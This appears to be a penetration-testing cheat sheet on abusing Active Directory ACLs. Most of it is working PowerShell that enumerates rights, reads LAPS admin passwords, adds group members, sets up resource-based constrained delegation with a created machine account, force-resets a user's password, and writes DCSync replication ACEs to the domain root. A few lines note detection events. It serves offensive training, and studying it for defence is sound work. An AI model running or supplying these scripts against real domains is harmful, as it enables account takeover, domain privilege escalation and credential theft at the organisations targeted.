ACL Abuse

Enumeration

# Import the ActiveDirectory module from a copied DLL (works without RSAT installed); this also maps the AD: PSDrive used below
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1

# Get the user's DistinguishedName (shown in the default output)
Get-ADUser -Identity USER

# List the ACEs on that user's object, i.e. which principals hold rights over USER
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
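The Get-Acl call above answers "who has rights over this object". The other direction, "where does a compromised principal hold rights", needs every object's ACL filtered on IdentityReference. The following is an added example, not code from the original page; it assumes the AD: drive is mapped by the ActiveDirectory module and that the principal of interest is the hypothetical TECHCORP\studentuser.

```powershell
# Added example: find every object where a given principal holds an abusable right.
# Assumes the ActiveDirectory module is loaded (AD: drive present).
$who         = 'TECHCORP\studentuser'   # hypothetical compromised principal
$interesting = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight|Self'

# Walk every object under the domain root; on a large domain narrow -SearchBase to an OU
Get-ADObject -Filter * -SearchBase (Get-ADDomain).DistinguishedName |
  ForEach-Object {
    $dn = $_.DistinguishedName
    (Get-Acl -Path "AD:\$dn").Access |
      Where-Object { $_.IdentityReference.Value -eq $who -and
                     $_.AccessControlType -eq 'Allow' -and
                     $_.ActiveDirectoryRights -match $interesting } |
      ForEach-Object {
        [pscustomobject]@{
          Object     = $dn
          Rights     = $_.ActiveDirectoryRights
          # GUID of the attribute or extended right the ACE is scoped to;
          # the all-zero GUID means the right applies to the whole object
          ObjectType = $_.ObjectType
          Inherited  = $_.IsInherited
        }
      }
  } | Format-Table -AutoSize
```

Rights inherited from an OU show up with Inherited = True on every child object, which is the usual way a "harmless" OU delegation turns into rights over dozens of computers or users. Deny ACEs are skipped here; when reading a real ACL remember that an explicit Deny on the same object overrides an Allow.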

ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. LAPS stores the local administrator password in the confidential attribute ms-Mcs-AdmPwd on each computer object, and reading a confidential attribute requires the Control Access (ExtendedRight) permission. A principal with ReadProperty + ExtendedRight on an OU can therefore read the cleartext local admin password of every computer under it.

# Import the LAPS management module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1

# List the principals (ExtendedRightHolders) that can read LAPS passwords for computers in the OU
Find-AdmPwdExtendedRights -Identity <OU>

# Once we have compromised one of those principals, read the password and its expiry
Get-AdmPwdPassword -ComputerName <targetmachine>

WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group: WriteProperty on the member attribute and GenericAll allow adding any principal, while Self (Self-Membership) only allows adding the compromised account itself.

# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USER

# Check
Get-ADGroupMember -Identity "LocalAdmins"

GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform a Resource Based Constrained Delegation attack: write msDS-AllowedToActOnBehalfOfOtherIdentity on the computer object so that an account we control is trusted to delegate to it, then use S4U2Self/S4U2Proxy to obtain a service ticket to that computer as any user.
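The AD-side part of that attack with only the ActiveDirectory module, as an added example that is not code from the page. It assumes the compromised principal has GenericWrite, GenericAll or WriteProperty on the hypothetical computer object TARGETSRV, and that ms-DS-MachineAccountQuota still allows creating a machine account; EVILPC and its password are constructed values.

```powershell
# Added example: configure RBCD on a target computer whose object we can write.
$target   = 'TARGETSRV'                                                  # hypothetical target
$fakeName = 'EVILPC'                                                     # hypothetical attacker-owned machine account
$fakePass = ConvertTo-SecureString 'Winter2024!Rbcd' -AsPlainText -Force # constructed password

# 1. Can we still create a machine account? The default quota is 10 per user.
$domain = Get-ADDomain
$quota  = (Get-ADObject -Identity $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
if ($quota -lt 1) {
    throw "ms-DS-MachineAccountQuota is $quota; use an existing account with a known password and an SPN instead"
}

# 2. Create the machine account whose password we know
New-ADComputer -Name $fakeName -SamAccountName "$fakeName`$" -AccountPassword $fakePass -Enabled $true

# 3. Write msDS-AllowedToActOnBehalfOfOtherIdentity on the target.
#    This is the single attribute write the ACL entitles us to; note it REPLACES any existing value.
Set-ADComputer -Identity $target -PrincipalsAllowedToDelegateToAccount (Get-ADComputer -Identity $fakeName)

# 4. Check: the target now lists our account as allowed to delegate to it
Get-ADComputer -Identity $target -Properties PrincipalsAllowedToDelegateToAccount |
    Select-Object -ExpandProperty PrincipalsAllowedToDelegateToAccount

# From here, S4U2Self + S4U2Proxy as EVILPC$ (for example with a Kerberos tool such as Rubeus)
# yields a service ticket to TARGETSRV impersonating an arbitrary user; that step is outside this snippet.
```

Because step 3 overwrites the existing descriptor, save the current value of msDS-AllowedToActOnBehalfOfOtherIdentity before writing it if the engagement requires restoring the target. Defenders can alert on modifications of that attribute (directory service change auditing) and on machine account creation by non-admin users.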

GenericAll over User Object

Can reset the user's password without knowing the old one (Set-ADAccountPassword -Reset). This is loud: the legitimate user can no longer log in, and the DC logs event 4724 (an attempt was made to reset an account's password).
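The reset and the check that it took effect, as an added example not taken from the page. It assumes GenericAll over the hypothetical user targetuser; the new password is a constructed value.

```powershell
# Added example: reset a user's password with GenericAll and verify the new credential works.
$victim = 'targetuser'                                                  # hypothetical target user
$newPwd = ConvertTo-SecureString 'Str0ngP@ss!2024' -AsPlainText -Force  # constructed new password

# Record pwdLastSet before the change so we can see that the reset applied
$before = (Get-ADUser -Identity $victim -Properties pwdLastSet).pwdLastSet

# -Reset sets a new password without supplying the old one; this is the write GenericAll permits
Set-ADAccountPassword -Identity $victim -Reset -NewPassword $newPwd

# Check 1: pwdLastSet advanced
$after = (Get-ADUser -Identity $victim -Properties pwdLastSet).pwdLastSet
if ($after -le $before) { throw "pwdLastSet did not advance; the reset may not have applied" }

# Check 2: the new credential authenticates against the PDC emulator (avoids replication lag)
$netbios = (Get-ADDomain).NetBIOSName
$cred    = New-Object System.Management.Automation.PSCredential("$netbios\$victim", $newPwd)
Get-ADUser -Identity $victim -Credential $cred -Server (Get-ADDomain).PDCEmulator |
    Select-Object SamAccountName, Enabled, PasswordExpired
```

If the account has "user must change password at next logon" set, interactive logon will prompt for a change; the LDAP bind in check 2 still succeeds.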

WriteDACL over Domain Object

Can grant a principal the replication rights DCSync needs (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set) by adding ACEs to the domain root. With Set-ADACL from the RACE toolkit:

Set-ADACL -SamAccountName USER -DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
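The same grant with only the ActiveDirectory module, plus a check that lists who currently holds replication rights on the domain root. This is an added example, not code from the page or from RACE; it assumes the session holds WriteDACL on the domain object and that the hypothetical user studentuser is the one receiving DCSync rights.

```powershell
# Added example: grant DCSync rights with stock cmdlets and verify who holds them.
$domainDN  = (Get-ADDomain).DistinguishedName
$principal = Get-ADUser -Identity 'studentuser'   # hypothetical recipient

# Control-access right GUIDs for the three replication rights DCSync relies on
$replRights = @{
    'DS-Replication-Get-Changes'                 = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
    'DS-Replication-Get-Changes-All'             = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
    'DS-Replication-Get-Changes-In-Filtered-Set' = '89e95b76-444d-4c62-991a-0facbeda640c'
}

# Add one Allow ExtendedRight ACE per replication right; WriteDACL is what lets Set-Acl succeed
$acl = Get-Acl -Path "AD:\$domainDN"
foreach ($guid in $replRights.Values) {
    $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $principal.SID,
        [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight,
        [System.Security.AccessControl.AccessControlType]::Allow,
        [Guid]$guid
    )
    $acl.AddAccessRule($ace)
}
Set-Acl -Path "AD:\$domainDN" -AclObject $acl

# Check: every ACE on the domain root that grants a replication right, with its holder.
# Run this alone to audit for DCSync capability; only DCs, Domain/Enterprise Admins and
# a few well-known principals should appear.
$guidToName = @{}
foreach ($name in $replRights.Keys) { $guidToName[$replRights[$name]] = $name }
(Get-Acl -Path "AD:\$domainDN").Access |
    Where-Object { $guidToName.ContainsKey($_.ObjectType.ToString()) } |
    Select-Object IdentityReference, AccessControlType,
                  @{ n = 'Right'; e = { $guidToName[$_.ObjectType.ToString()] } } |
    Sort-Object IdentityReference
```

The three ACEs are written as distinct ExtendedRight entries, which is exactly what appears in event 5136 (directory object modified) on the DC when the nTSecurityDescriptor of the domain root changes; that event, plus any unexpected holder in the check output, is the detection side of this technique.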
